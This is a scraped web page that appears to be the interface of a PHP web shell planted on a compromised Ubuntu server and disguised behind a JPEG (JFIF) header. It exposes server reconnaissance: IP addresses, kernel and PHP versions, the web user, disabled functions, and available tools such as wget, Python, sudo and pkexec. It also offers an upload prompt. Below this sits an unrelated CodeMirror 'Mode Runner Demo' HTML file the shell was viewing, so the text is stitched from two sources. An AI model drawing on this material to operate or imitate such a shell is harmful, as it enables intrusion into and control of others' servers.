????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.147.69.134 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/doc/libjs-codemirror/examples/ |
Upload File : |
<!doctype html> <html> <head> <title>CodeMirror: Mode Runner Demo</title> <link rel="stylesheet" href="../lib/codemirror.css"> <script src="../lib/codemirror.js"></script> <script src="../lib/util/runmode.js"></script> <script src="../mode/xml/xml.js"></script> <link rel="stylesheet" href="../doc/docs.css"> </head> <body> <h1>CodeMirror: Mode Runner Demo</h1> <textarea id="code" style="width: 90%; height: 7em; border: 1px solid black; padding: .2em .4em;"> <foobar> <blah>Enter your xml here and press the button below to display it as highlighted by the CodeMirror XML mode</blah> <tag2 foo="2" bar="&quot;bar&quot;"/> </foobar></textarea><br> <button onclick="doHighlight();">Highlight!</button> <pre id="output" class="cm-s-default"></pre> <script> function doHighlight() { CodeMirror.runMode(document.getElementById("code").value, "application/xml", document.getElementById("output")); } </script> <p>Running a CodeMirror mode outside of the editor. The <code>CodeMirror.runMode</code> function, defined in <code><a href="../lib/util/runmode.js">lib/runmode.js</a></code> takes the following arguments:</p> <dl> <dt><code>text (string)</code></dt> <dd>The document to run through the highlighter.</dd> <dt><code>mode (<a href="../doc/manual.html#option_mode">mode spec</a>)</code></dt> <dd>The mode to use (must be loaded as normal).</dd> <dt><code>output (function or DOM node)</code></dt> <dd>If this is a function, it will be called for each token with two arguments, the token's text and the token's style class (may be <code>null</code> for unstyled tokens). If it is a DOM node, the tokens will be converted to <code>span</code> elements as in an editor, and inserted into the node (through <code>innerHTML</code>).</dd> </dl> </body> </html>